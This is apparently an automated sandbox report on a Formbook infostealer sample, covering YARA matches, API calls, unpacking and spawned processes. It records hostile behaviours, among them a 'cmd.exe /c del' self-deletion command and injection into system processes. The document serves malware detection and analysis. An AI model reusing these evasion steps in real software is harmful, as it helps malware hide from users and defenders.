          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/4@3/4
          Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_00404356 GetDlgItem, SetWindowTextA, SHBrowseForFolderA, CoTaskMemFree, lstrcmpiA, lstrcatA, SetDlgItemTextA, GetDiskFreeSpaceA, MulDiv, SetDlgItemTextA
          Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_00402020 CoCreateInstance, MultiByteToWideChar
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_01
          Source: C:\Users\user\Desktop\2435.exe | File created: C:\Users\user\AppData\Local\Temp\nsq164.tmp
          Source: 2435.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2435.exe | File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\2435.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: 2435.exe | ReversingLabs: Detection: 43%
          Source: C:\Users\user\Desktop\2435.exe | File read: C:\Users\user\Desktop\2435.exe
          Source: unknown | Process created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Users\user\Desktop\2435.exe | Process created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\2435.exe | Process created: C:\Users\user\Desktop\2435.exe 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'
          Source: C:\Users\user\Desktop\2435.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: wntdll.pdbUGP source: 2435.exe, 00000000.00000003.228355721.0000000009B60000.00000004.00000001.sdmp, 2435.exe, 00000001.00000002.288517092.0000000000B6F000.00000040.00000001.sdmp, control.exe, 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 2435.exe, control.exe
          Source: Binary string: control.pdbUGP source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\2435.exe | Unpacked PE file: 1.2.2435.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_00405E88 GetModuleHandleA, LoadLibraryA, GetProcAddress
          Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_73352F60 push eax; ret
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_0041E560 push ss; ret
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\2435.exe | Code function: 1_2_00ACD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_0478D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FCCEB5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FCCF6C push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FCCF0B push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FCCF02 push eax; ret
          Source: C:\Windows\SysWOW64\control.exe | Code function: 9_2_02FCE560 push ss; ret
          Source: C:\Users\user\Desktop\2435.exe | File created: C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll

          Hooking and other Techniques for Hiding and Protection: